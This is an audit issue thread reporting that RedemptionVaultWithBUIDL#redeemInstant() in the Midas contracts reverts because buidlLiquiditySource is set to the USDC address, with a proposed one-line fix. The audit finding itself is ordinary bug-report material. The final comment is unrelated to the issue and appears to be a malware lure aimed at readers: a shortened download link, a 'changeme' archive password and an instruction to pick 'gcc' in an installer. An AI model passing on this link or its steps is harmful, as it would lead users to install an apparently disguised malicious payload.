### ISSUE TITLE
0xpiken - `RedemptionVaultWithBUIDL#redeemInstant()` does not work due to an incorrect function call

### ISSUE THREAD

**Issue by sherlock-admin2** [sherlock-audit/2024-08-midas-minter-redeemer-judging#75]
0xpiken

Medium

# `RedemptionVaultWithBUIDL#redeemInstant()` does not work due to an incorrect function call

## Summary
[`RedemptionVaultWithBUIDL#redeemInstant()`](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVaultWithBUIDL.sol#L86-L156) does not work due to an incorrect function call
## Vulnerability Detail
[`RedemptionVaultWithBUIDL#redeemInstant()`](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVaultWithBUIDL.sol#L86-L156) allows eligible user to redeem `mToken` for `USDC`.
If `USDC` balance in `RedemptionVaultWithBUIDL` is not enough, `BUIDL` token in `RedemptionVaultWithBUIDL` will be redeemed for `USDC` by calling `buidlRedemption#redeem()`.
When `redeemInstant()` is called, `tokenOut` should be set to `USDC` by default, regardless its input:
```solidity
100:        tokenOut = buidlLiquiditySource.token();
```
However, the incorrect function call will cause a revert, making `redeemInstant()` non-functional:
`buidlLiquiditySource` was initialized in `initialize()`:
```solidity
70:        buidlRedemption = IRedemption(_buidlRedemption);
71:        buidlSettlement = ISettlement(buidlRedemption.settlement());
72:        buidlLiquiditySource = ILiquiditySource(buidlRedemption.liquidity());
```
As we can see, the value of `buidlLiquiditySource` is `buidlRedemption.liquidity()`, while the address of `buidlRedemption` on Ethereum is [`0x31D3F59Ad4aAC0eeE2247c65EBE8Bf6E9E470a53`](https://etherscan.io/address/0x31D3F59Ad4aAC0eeE2247c65EBE8Bf6E9E470a53), and the call of [`buidlRedemption#liquidity()`](https://etherscan.io/address/0x31D3F59Ad4aAC0eeE2247c65EBE8Bf6E9E470a53#readContract#F2) will return [`0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48`](https://etherscan.io/address/0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48), aka `USDC`.
Since `buidlLiquiditySource` is initialized to `USDC`, calling `buidlLiquiditySource.token()` will always revert.

## Impact
`RedemptionVaultWithBUIDL#redeemInstant()` does not work due to an incorrect function call
## Code Snippet
https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVaultWithBUIDL.sol#L72
https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVaultWithBUIDL.sol#L100
## Tool used

Manual Review

## Recommendation
correct the wrong call in `redeemInstant()`:
```diff
-       tokenOut = buidlLiquiditySource.token();
+       tokenOut = buidlRedemption.liquidity();
```

Duplicate of #99

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
